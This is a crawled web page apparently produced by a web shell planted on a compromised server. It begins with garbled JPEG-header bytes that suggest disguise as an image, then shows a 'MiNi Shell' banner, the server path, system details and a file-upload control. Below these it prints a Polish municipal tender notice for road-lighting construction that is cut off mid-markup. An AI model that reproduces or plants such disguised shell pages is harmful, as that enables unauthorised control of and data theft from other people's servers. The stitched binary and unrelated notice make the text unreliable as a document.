JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240321/0025439601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa linii oświetlenia drogowego wraz z lampami oświetlenia drogowego na terenie Gminy Redzikowo w miejscowościach Lubuczewo, Bydlino, Włynkowo i Stanięcino </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Redzikowo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979855</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sportowa</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Słupsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bartoszl@gminaredzikowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.gminaredzikowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa linii oświetlenia drogowego wraz z lampami oświetlenia drogowego na terenie Gminy Redzikowo w miejscowościach Lubuczewo, Bydlino, Włynkowo i Stanięcino </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4e0e6636-e76a-11ee-a01e-f641a8763d5f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00254396</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00051278/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Budowa linii oświetlenia drogowego wraz z lampami oświetlenia drogowego na terenie Gminy Redzikowo w miejscowościach Lubuczewo, Bydlino, Włynkowo i Stanięcino</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ug_redzikowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ug_redzikowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/ug_slupsk 12.2. W celu skrócenia<br/>czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a<br/>wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane<br/>są w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do<br/>zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji<br/>przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku<br/>„Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została<br/>wysłana do zamawiającego. 15.1. Oferta składana elektronicznie musi zostać podpisana<br/>elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. W<br/>procesie składania oferty na platformie, kwalifikowany podpis elektroniczny wykonawca może złożyć<br/>bezpośrednio na dokumencie, który następnie przesyła do systemu (opcja rekomendowana przez<br/>platformazakupowa.pl) oraz dodatkowo dla całego pakietu dokumentów w kroku 2 Formularza<br/>składania oferty lub wniosku (po kliknięciu w przycisk Przejdź do podsumowania). 15.3. Oferta powinna<br/>być: a) sporządzona na podstawie załączników niniejszej SWZ w języku polskim, b) złożona przy<br/>użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl, c) podpisana<br/>kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez<br/>osobę/osoby upoważnioną/upoważnione 15.4. Podpisy kwalifikowane wykorzystywane przez<br/>wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu<br/>Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji<br/>elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”. 15.5. W<br/>przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający wymaga dołączenia<br/>odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików XAdES. 15.6. Zgodnie z art.<br/>18 ust. 3 ustawy Pzp, nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu<br/>nieuczciwej konkurencji. Jeżeli wykonawca, nie później niż w<br/>terminie składania ofert, w sposób niebudzący wątpliwości zastrzegł, że nie mogą być one<br/>udostępniane oraz wykazał, załączając stosowne wyjaśnienia, iż zastrzeżone informacje stanowią<br/>tajemnicę przedsiębiorstwa. Na platformie w formularzu składania oferty znajduje się miejsce<br/>wyznaczone do dołączenia części oferty stanowiącej tajemnicę przedsiębiorstwa. 15.7. Wykonawca, za<br/>pośrednictwem platformazakupowa.pl może przed upływem terminu do składania ofert zmienić lub<br/>wycofać ofertę. Sposób dokonywania zmiany lub wycofania oferty zamieszczono w instrukcji<br/>zamieszczonej na stronie internetowej pod adresem:https://platformazakupowa.pl/strona/45-instrukcje<br/>15.11. Zgodnie z definicją dokumentu elektronicznego z art.3 ustęp 2 Ustawy o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, opatrzenie pliku zawierającego<br/>skompresowane dane kwalifikowanym podpisem elektronicznym jest jednoznaczne z podpisaniem<br/>oryginału dokumentu, z wyjątkiem kopii poświadczonych odpowiednio przez innego wykonawcę<br/>ubiegającego się wspólnie z nim o udzielenie zamówienia, przez podmiot, na którego zdolnościach lub<br/>sytuacji polega wykonawca, albo przez podwykonawcę.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Pani/Pana danych osobowych jest Wójt<br/>Gminy Redzikowo – Urząd Gminy Redzikowo, Sportowa 34, 76-200 Słupskikontakt z Inspektorem Ochrony<br/>Danych1 – iod@gminaredzikowo.pl lub na adres: Urząd Gminy Redzikowo, Sportowa 34, 76-200<br/>SłupskPani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia: Budowa linii oświetlenia drogowego wraz z lampami oświetlenia drogowego na terenie Gminy Redzikowo w miejscowościach Lubuczewo, Bydlino, Włynkowo i Stanięcino Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97<br/>ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a<br/>jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy;posiada Pani/Pan:-na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących;-na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych1;-na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2<br/>RODO2;-prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;nie<br/>przysługuje Pani/Panu:-w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;- na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.odbiorcami<br/>Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo<br/>zamówień publicznych (Dz. U. z 2018 r. poz. 1986 ze zm.), dalej „ustawa Pzp”;Przysługuje Pani/Panu<br/>również prawo wniesienia skargi do organu nadzorczego zajmującego się ochroną danych<br/>osobowychobowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp;w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Administratorem Pani/Pana danych osobowych jest Wójt<br/>Gminy Redzikowo – Urząd Gminy Redzikowo, Sportowa 34, 76-200 Słupskikontakt z Inspektorem Ochrony<br/>Danych1 – iod@gminaredzikowo.pl lub na adres: Urząd Gminy Redzikowo, Sportowa 34, 76-200<br/>SłupskPani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia: Budowa linii oświetlenia drogowego wraz z lampami oświetlenia drogowego na terenie Gminy Redzikowo w miejscowościach Lubuczewo, Bydlino, Włynkowo i Stanięcino Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97<br/>ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a<br/>jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy;posiada Pani/Pan:-na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących;-na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych1;-na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2<br/>RODO2;-prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;nie<br/>przysługuje Pani/Panu:-w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;- na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.odbiorcami<br/>Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo<br/>zamówień publicznych (Dz. U. z 2018 r. poz. 1986 ze zm.), dalej „ustawa Pzp”;Przysługuje Pani/Panu<br/>również prawo wniesienia skargi do organu nadzorczego zajmującego się ochroną danych<br/>osobowychobowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp;w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 Budowa linii oświetlenia wraz z lampami oświetlenia ulicznego na dz. nr 221,223/1224/1, 225/12 i 225/14w m. Włynkowo, gm. Redzikowo. <br/>Zgodnie z załączoną dokumentacją przewiduje się:<br/>- wybudowanie linii kablowej YAKXS 4x25mm2, ca 300m w osłonie Arot;<br/>- montaż słupa podwójnie-ocynkowanego h=6m na fundamencie – 7 .sztuk,<br/>( słup nr 2/3, 2/2/2/1, 1/1,1/2, 1/3,1/5) -1/4 bez słupa jedynie pętla pętla <br/>- fundament prefabrykowany jednoczęściowy - 7.szt. <br/>- montaż nowych opraw - 7 sztuk; na wysięgniku<br/> - 38 W - 4 sztuk;<br/>- min. 5 stopniowa redukcja mocy oświetlenia zaprogramowana wstępnie:<br/> 100% od 6,00 do 20,00<br/> 80% od 20,00 do 22,00<br/> 60% od 22,00 do 24,00<br/> 40% od 24,00 do 5,00<br/>- dostarczyć geodezję powykonawczą<br/>- Szafka sterownicza SO<br/>- zagospodarowanie terenu: doprowadzenie terenu do stanu pierwotnego.<br/>W/w zakres prac należy wykonać zgodnie projektem technicznym decyzja nr AB.6743.1129.2022.IX z dnia 05.12.2022 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2 Budowa linii oświetlenia wraz z lampami oświetlenia ulicznego na dz. nr 152 i 20 w m. Włynkowo, gm. Redzikowo.<br/>- wybudowanie linii kablowej YAKXS 4x25mm2, ca 300m w osłonie Arot;<br/>- montaż słupa podwójnie-ocynkowanego h=6m na fundamencie – 7 .sztuk,<br/>( słup nr 2/3, 2/2/2/1, 1/1,1/2, 1/3,1/5) -1/4 bez słupa jedynie pętla pętla <br/>- fundament prefabrykowany jednoczęściowy - 7.szt. <br/>- montaż nowych opraw - 7 sztuk; na wysięgniku<br/>- 38 W - 4 sztuk;<br/>- min. 5 stopniowa redukcja mocy oświetlenia zaprogramowana wstępnie:<br/> 100% od 6,00 do 20,00<br/> 80% od 20,00 do 22,00<br/> 60% od 22,00 do 24,00<br/> 40% od 24,00 do 5,00<br/>- dostarczyć geodezję powykonawczą<br/>- Szafka sterownicza SO<br/>- zagospodarowanie terenu: doprowadzenie terenu do stanu pierwotnego.<br/>W/w zakres prac należy wykonać zgodnie projektem technicznym decyzja nr AB.6743.1129.2022.IX z dnia 05.12.2022 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 Budowa linii oświetlenia wraz z lampami oświetlenia ulicznego na dz. nr 2/265 i 2/267w m. Bydlino,, gm. Redzikowo. <br/>Zgodnie z załączoną dokumentacją przewiduje się:<br/>- wybudowanie linii kablowej YAKXS 4x25mm2, ca 320m osłonie Arot;<br/>- montaż słupa podwójnie-ocynkowanego h=8m na fundamencie – 8 .sztuk,<br/>- fundament prefabrykowany jednoczęściowy - 8 szt. <br/>- montaż nowych opraw - 8 sztuk; <br/>- 31 W – 8 sztuk;<br/>- min. 5 stopniowa redukcja mocy oświetlenia zaprogramowana wstępnie:<br/> 100% od 6,00 do 20,00<br/> 80% od 20,00 do 22,00<br/> 60% od 22,00 do 24,00<br/> 40% od 24,00 do 5,00<br/>- dostarczyć geodezję powykonawczą<br/>- Szafka sterownicza SO<br/>- zagospodarowanie terenu: doprowadzenie terenu do stanu pierwotnego.<br/>W/w zakres prac należy wykonać zgodnie projektem technicznym decyzja nr AB.I.D. 731-297/2006. z dnia 26.06.2006 Decyzja nr 375/2006<br/>Odbiór oświetlenia na prądzie budowlanym – przyłącze w gestii wykonawcy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 